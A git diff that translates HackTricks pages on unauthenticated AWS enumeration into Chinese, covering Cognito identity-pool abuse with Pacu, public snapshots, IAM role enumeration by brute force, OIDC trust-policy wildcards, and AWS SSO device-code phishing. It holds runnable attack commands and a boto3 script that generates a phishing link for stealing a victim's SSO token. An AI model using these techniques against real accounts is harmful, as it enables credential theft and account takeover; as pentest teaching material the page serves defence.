code in Github will be running in a CodeBuild project with an IAM role attached. +这种Github Actions与AWS之间的新关系为从Github入侵AWS提供了另一种方式,因为Github中的代码将在附加了IAM角色的CodeBuild项目中运行。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md index 6f26f3a34..8e333067b 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md @@ -1,52 +1,44 @@ -# AWS - Cognito Unauthenticated Enum +# AWS - Cognito 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## Unauthenticated Cognito +## 未认证的 Cognito -Cognito is an AWS service that enable developers to **grant their app users access to AWS services**. Developers will grant **IAM roles to authenticated users** in their app (potentially people willbe able to just sign up) and they can also grant an **IAM role to unauthenticated users**. +Cognito 是一个 AWS 服务,使开发者能够 **授予他们的应用用户访问 AWS 服务的权限**。开发者将为其应用中的 **认证用户授予 IAM 角色**(潜在地,用户可以直接注册),他们也可以为 **未认证用户授予 IAM 角色**。 -For basic info about Cognito check: +有关 Cognito 的基本信息,请查看: {{#ref}} ../aws-services/aws-cognito-enum/ {{#endref}} -### Identity Pool ID +### 身份池 ID -Identity Pools can grant **IAM roles to unauthenticated users** that just **know the Identity Pool ID** (which is fairly common to **find**), and attacker with this info could try to **access that IAM rol**e and exploit it.\ -Moreoever, IAM roles could also be assigned to **authenticated users** that access the Identity Pool. If an attacker can **register a user** or already has **access to the identity provider** used in the identity pool you could access to the **IAM role being given to authenticated** users and abuse its privileges. +身份池可以为 **仅知道身份池 ID 的未认证用户** 授予 **IAM 角色**(这在 **查找** 时相当常见),拥有此信息的攻击者可能会尝试 **访问该 IAM 角色** 并利用它。\ +此外,IAM 角色也可以分配给访问身份池的 **认证用户**。如果攻击者能够 **注册用户** 或已经 **访问身份池中使用的身份提供者**,则可以访问 **授予认证用户的 IAM 角色** 并滥用其权限。 -[**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-identity-pools.md). +[**查看如何做到这一点**](../aws-services/aws-cognito-enum/cognito-identity-pools.md)。 -### User Pool ID +### 用户池 ID -By default Cognito allows to **register new user**. Being able to register a user might give you **access** to the **underlaying application** or to the **authenticated IAM access role of an Identity Pool** that is accepting as identity provider the Cognito User Pool. [**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration). +默认情况下,Cognito 允许 **注册新用户**。能够注册用户可能会使您 **访问** 到 **基础应用程序** 或 **接受 Cognito 用户池作为身份提供者的身份池的认证 IAM 访问角色**。 [**查看如何做到这一点**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration)。 -### Pacu modules for pentesting and enumeration +### Pacu 模块用于渗透测试和枚举 -[Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +[Pacu](https://github.com/RhinoSecurityLabs/pacu),AWS 利用框架,现在包括 "cognito\_\_enum" 和 "cognito\_\_attack" 模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。 -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. +有关模块功能的描述,请参见 [博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2) 的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。 -#### Usage - -Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: +#### 用法 +示例 `cognito__attack` 用法,尝试在给定身份池和用户池客户端上进行用户创建和所有权限提升向量: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: - +示例 cognito\_\_enum 用法,以收集当前 AWS 账户中可见的所有用户池、用户池客户端、身份池、用户等: ```bash Pacu (new:test) > run cognito__enum ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md index 004a92c2b..d6b013629 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md @@ -1,15 +1,9 @@ -# AWS - DocumentDB Unauthenticated Enum +# AWS - DocumentDB 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` .cluster-..docdb.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md index e9e7fa8e4..e495ac915 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md @@ -1,19 +1,15 @@ -# AWS - DynamoDB Unauthenticated Access +# AWS - DynamoDB 未认证访问 {{#include ../../../banners/hacktricks-training.md}} ## Dynamo DB -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-dynamodb-enum.md {{#endref}} -Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB. +除了访问所有 AWS 或某些被攻陷的外部 AWS 账户,或者在与 DynamoDB 通信的应用程序中存在一些 SQL 注入外,我不知道还有其他选项可以通过 DynamoDB 访问 AWS 账户。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md index 657bf7f3a..e2f79a64b 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md @@ -1,18 +1,18 @@ -# AWS - EC2 Unauthenticated Enum +# AWS - EC2 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## EC2 & Related Services +## EC2 及相关服务 -Check in this page more information about this: +在此页面查看更多信息: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -### Public Ports +### 公共端口 -It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. +可以将 **虚拟机的任何端口暴露给互联网**。根据 **暴露端口上运行的内容**,攻击者可能会利用它。 #### SSRF @@ -20,10 +20,9 @@ It's possible to expose the **any port of the virtual machines to the internet** https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} -### Public AMIs & EBS Snapshots - -AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account: +### 公共 AMI 和 EBS 快照 +AWS 允许 **任何人访问以下载 AMI 和快照**。您可以非常轻松地从自己的账户列出这些资源: ```bash # Public AMIs aws ec2 describe-images --executable-users all @@ -38,11 +37,9 @@ aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLo aws ec2 describe-snapshots --restorable-by-user-ids all aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' ``` +如果您发现一个可以被任何人恢复的快照,请确保查看 [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) 以获取下载和掠夺快照的说明。 -If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. - -#### Public URL template - +#### 公共 URL 模板 ```bash # EC2 ec2-{ip-seperated}.compute-1.amazonaws.com @@ -50,15 +47,8 @@ ec2-{ip-seperated}.compute-1.amazonaws.com http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 https://{user_provided}-{random_id}.{region}.elb.amazonaws.com ``` - -### Enumerate EC2 instances with public IP - +### 枚举具有公共 IP 的 EC2 实例 ```bash aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md index 2febbed62..3cd844602 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md @@ -1,38 +1,30 @@ -# AWS - ECR Unauthenticated Enum +# AWS - ECR 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## ECR -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Public registry repositories (images) - -As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image. +### 公共注册表存储库(镜像) +如ECS枚举部分所述,公共注册表是**任何人都可以访问的**,使用格式**`public.ecr.aws//`**。如果攻击者找到公共存储库URL,他可以**下载镜像并在镜像的元数据和内容中搜索敏感信息**。 ```bash aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text ``` - > [!WARNING] -> This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo. +> 这也可能发生在 **私有注册表** 中,其中注册表策略或存储库策略 **授予访问权限,例如 `"AWS": "*"`**。任何拥有 AWS 账户的人都可以访问该存储库。 -### Enumerate Private Repo - -The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry. +### 枚举私有存储库 +工具 [**skopeo**](https://github.com/containers/skopeo) 和 [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) 可用于列出私有注册表中可访问的存储库。 ```bash # Get image names skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+' crane ls | sed 's/ .*//' ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md index 8d0b02ba2..60684d978 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md @@ -1,19 +1,18 @@ -# AWS - ECS Unauthenticated Enum +# AWS - ECS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## ECS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} -### Publicly Accessible Security Group or Load Balancer for ECS Services - -A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks. +### 对 ECS 服务公开可访问的安全组或负载均衡器 +配置错误的安全组 **允许来自互联网的入站流量 (0.0.0.0/0 或 ::/0)** 可能会使 AWS 资源暴露于攻击之中。 ```bash # Example of detecting misconfigured security group for ECS services aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]' @@ -21,9 +20,4 @@ aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contain # Example of detecting a publicly accessible load balancer for ECS services aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]' ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md index 3a73a7328..a4d69ded2 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md @@ -4,7 +4,7 @@ ## Elastic Beanstalk -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md @@ -12,30 +12,24 @@ For more information check: ### Web vulnerability -Note that by default Beanstalk environments have the **Metadatav1 disabled**. +请注意,默认情况下,Beanstalk 环境的 **Metadatav1 被禁用**。 -The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`** +Beanstalk 网页的格式为 **`https://-env..elasticbeanstalk.com/`** ### Insecure Security Group Rules -Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**. +配置错误的安全组规则可能会使 Elastic Beanstalk 实例暴露于公众。**过于宽松的入站规则,例如允许来自任何 IP 地址 (0.0.0.0/0) 的敏感端口流量,可能会使攻击者访问实例**。 ### Publicly Accessible Load Balancer -If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments. +如果 Elastic Beanstalk 环境使用负载均衡器,并且负载均衡器配置为公开可访问,攻击者可以 **直接向负载均衡器发送请求**。虽然这对于旨在公开访问的 Web 应用程序可能不是问题,但对于私有应用程序或环境可能会成为问题。 ### Publicly Accessible S3 Buckets -Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**. +Elastic Beanstalk 应用程序通常在部署前存储在 S3 存储桶中。如果包含应用程序的 S3 存储桶是公开可访问的,攻击者可能会 **下载应用程序代码并搜索漏洞或敏感信息**。 ### Enumerate Public Environments - ```bash aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md index 6ed2b74fe..76fedaa44 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md @@ -2,15 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` https://vpc-{user_provided}-[random].[region].es.amazonaws.com https://search-{user_provided}-[random].[region].es.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md index b6092fda4..c7b2352c3 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md @@ -1,180 +1,162 @@ -# AWS - IAM & STS Unauthenticated Enum +# AWS - IAM & STS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## Enumerate Roles & Usernames in an account +## 枚举账户中的角色和用户名 -### ~~Assume Role Brute-Force~~ +### ~~假设角色暴力破解~~ > [!CAUTION] -> **This technique doesn't work** anymore as if the role exists or not you always get this error: +> **此技术不再有效**,因为无论角色是否存在,您总是会收到此错误: > > `An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas` > -> You can **test this running**: +> 您可以**通过运行以下命令进行测试**: > > `aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example` -Attempting to **assume a role without the necessary permissions** triggers an AWS error message. For instance, if unauthorized, AWS might return: - +尝试**在没有必要权限的情况下假设角色**会触发 AWS 错误消息。例如,如果未授权,AWS 可能会返回: ```ruby An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS ``` - -This message confirms the role's existence but indicates that its assume role policy does not permit your assumption. In contrast, trying to **assume a non-existent role leads to a different error**: - +此消息确认角色的存在,但表明其假设角色策略不允许您进行假设。相比之下,尝试**假设一个不存在的角色会导致不同的错误**: ```less An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole ``` +有趣的是,这种**区分现有角色和不存在角色**的方法甚至适用于不同的AWS账户。只需一个有效的AWS账户ID和一个目标词汇表,就可以枚举该账户中存在的角色,而不会面临任何固有的限制。 -Interestingly, this method of **discerning between existing and non-existing roles** is applicable even across different AWS accounts. With a valid AWS account ID and a targeted wordlist, one can enumerate the roles present in the account without facing any inherent limitations. +您可以使用这个[脚本来枚举潜在的主体](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum)来利用这个问题。 -You can use this [script to enumerate potential principals](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) abusing this issue. +### 信任策略:暴力破解跨账户角色和用户 -### Trust Policies: Brute-Force Cross Account roles and users - -Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided. +配置或更新**IAM角色的信任策略涉及定义哪些AWS资源或服务被允许假设该角色**并获取临时凭证。如果策略中指定的资源**存在**,则信任策略**成功**保存。然而,如果资源**不存在**,则会生成一个**错误**,指示提供了无效的主体。 > [!WARNING] -> Note that in that resource you could specify a cross account role or user: +> 请注意,在该资源中,您可以指定一个跨账户角色或用户: > > - `arn:aws:iam::acc_id:role/role_name` > - `arn:aws:iam::acc_id:user/user_name` -This is a policy example: - +这是一个策略示例: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::216825089941:role/Test" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::216825089941:role/Test" +}, +"Action": "sts:AssumeRole" +} +] } ``` - #### GUI -That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. (The error is for update, but it also works when creating) +如果您使用一个**不存在的角色**,您将会发现这个**错误**。如果角色**存在**,策略将会**保存**而没有任何错误。(这个错误是针对更新的,但在创建时也适用) ![](<../../../images/image (153).png>) #### CLI - ```bash ### You could also use: aws iam update-assume-role-policy # When it works aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json { - "Role": { - "Path": "/", - "RoleName": "Test-Role", - "RoleId": "AROA5ZDCUJS3DVEIYOB73", - "Arn": "arn:aws:iam::947247140022:role/Test-Role", - "CreateDate": "2022-05-03T20:50:04Z", - "AssumeRolePolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::316584767888:role/account-balance" - }, - "Action": [ - "sts:AssumeRole" - ] - } - ] - } - } +"Role": { +"Path": "/", +"RoleName": "Test-Role", +"RoleId": "AROA5ZDCUJS3DVEIYOB73", +"Arn": "arn:aws:iam::947247140022:role/Test-Role", +"CreateDate": "2022-05-03T20:50:04Z", +"AssumeRolePolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::316584767888:role/account-balance" +}, +"Action": [ +"sts:AssumeRole" +] +} +] +} +} } # When it doesn't work aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2" ``` - -You can automate this process with [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools) +您可以使用 [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools) 自动化此过程。 - `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt` -Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu): +我们使用 [Pacu](https://github.com/RhinoSecurityLabs/pacu): - `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` - `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` -- The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration +- 示例中使用的 `admin` 角色是 **您帐户中的一个角色,由 pacu 进行模拟** 以创建其需要创建的策略以进行枚举。 ### Privesc -In the case the role was bad configured an allows anyone to assume it: - +如果角色配置不当并允许任何人假设它: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "sts:AssumeRole" +} +] } ``` +攻击者可以假设它。 -The attacker could just assume it. - -## Third Party OIDC Federation - -Imagine that you manage to read a **Github Actions workflow** that is accessing a **role** inside **AWS**.\ -This trust might give access to a role with the following **trust policy**: +## 第三方 OIDC 联邦 +想象一下,你设法读取一个访问 **AWS** 内部 **角色** 的 **Github Actions 工作流**。\ +这个信任可能会给予对具有以下 **信任策略** 的角色的访问: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"token.actions.githubusercontent.com:aud": "sts.amazonaws.com" +} +} +} +] } ``` +这个信任策略可能是正确的,但**缺乏更多条件**应该让你对它产生不信任。\ +这是因为之前的角色可以被**来自 Github Actions 的任何人**假设!你应该在条件中指定其他内容,例如组织名称、仓库名称、环境、分支... -This trust policy might be correct, but the **lack of more conditions** should make you distrust it.\ -This is because the previous role can be assumed by **ANYONE from Github Actions**! You should specify in the conditions also other things such as org name, repo name, env, brach... - -Another potential misconfiguration is to **add a condition** like the following: - +另一个潜在的错误配置是**添加一个条件**,如下所示: ```json "StringLike": { - "token.actions.githubusercontent.com:sub": "repo:org_name*:*" +"token.actions.githubusercontent.com:sub": "repo:org_name*:*" } ``` +注意在**冒号**(:)之前的**通配符**(*)。您可以创建一个名为**org_name1**的组织,并从Github Action中**假设角色**。 -Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org_name1** and **assume the role** from a Github Action. - -## References +## 参考文献 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md index fd4d31de6..093e481ad 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md @@ -1,36 +1,33 @@ -# AWS - Identity Center & SSO Unauthenticated Enum +# AWS - Identity Center & SSO 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## AWS Device Code Phishing +## AWS 设备代码钓鱼 -Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), it's possible to send a **link** to a user using AWS SSO that if the **user accepts** the attacker will be able to get a **token to impersonate the user** and access all the roles the user is able to access in the **Identity Center**. +最初在 [**这篇博客文章**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) 中提出,可以向使用 AWS SSO 的用户发送一个 **链接**,如果 **用户接受**,攻击者将能够获取一个 **令牌以冒充用户** 并访问用户能够访问的所有角色在 **Identity Center** 中。 -In order to perform this attack the requisites are: +为了执行此攻击,前提条件是: -- The victim needs to use **Identity Center** -- The attacker must know the **subdomain** used by the victim `.awsapps.com/start` +- 受害者需要使用 **Identity Center** +- 攻击者必须知道受害者使用的 **子域名** `.awsapps.com/start` -Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account. +仅凭上述信息,**攻击者将能够向用户发送一个链接**,如果 **接受**,将授予 **攻击者对 AWS 用户** 账户的访问权限。 -### Attack +### 攻击 -1. **Finding the subdomain** +1. **查找子域名** -The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via **OSINT** or **guessing + BF** as most companies will be using their name or a variation of their name here. - -With this info, it's possible to get the region where the Indentity Center was configured with: +攻击者的第一步是找出受害者公司在其 Identity Center 中使用的子域名。这可以通过 **OSINT** 或 **猜测 + BF** 来完成,因为大多数公司将在这里使用其名称或其名称的变体。 +有了这些信息,就可以获取配置 Identity Center 的区域: ```bash curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"' "region":"us-east-1 ``` +2. **生成受害者的链接并发送** -2. **Generate the link for the victim & Send it** - -Run the following code to generate an AWS SSO login link so the victim can authenticate.\ -For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token: - +运行以下代码以生成 AWS SSO 登录链接,以便受害者可以进行身份验证。\ +在演示中,在 Python 控制台中运行此代码,并且不要退出,因为稍后您将需要一些对象来获取令牌: ```python import boto3 @@ -39,89 +36,84 @@ AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS sso_oidc = boto3.client('sso-oidc', region_name=REGION) client = sso_oidc.register_client( - clientName = 'attacker', - clientType = 'public' +clientName = 'attacker', +clientType = 'public' ) client_id = client.get('clientId') client_secret = client.get('clientSecret') authz = sso_oidc.start_device_authorization( - clientId=client_id, - clientSecret=client_secret, - startUrl=AWS_SSO_START_URL +clientId=client_id, +clientSecret=client_secret, +startUrl=AWS_SSO_START_URL ) url = authz.get('verificationUriComplete') deviceCode = authz.get('deviceCode') print("Give this URL to the victim: " + url) ``` +发送生成的链接给受害者,利用你出色的社会工程技巧! -Send the generated link to the victim using you awesome social engineering skills! +3. **等待受害者接受** -3. **Wait until the victim accepts it** - -If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\ -This is how the promp looks nowadays: +如果受害者**已经登录AWS**,他只需接受授予权限;如果没有,他需要**登录然后接受授予权限**。\ +这就是现在提示的样子:
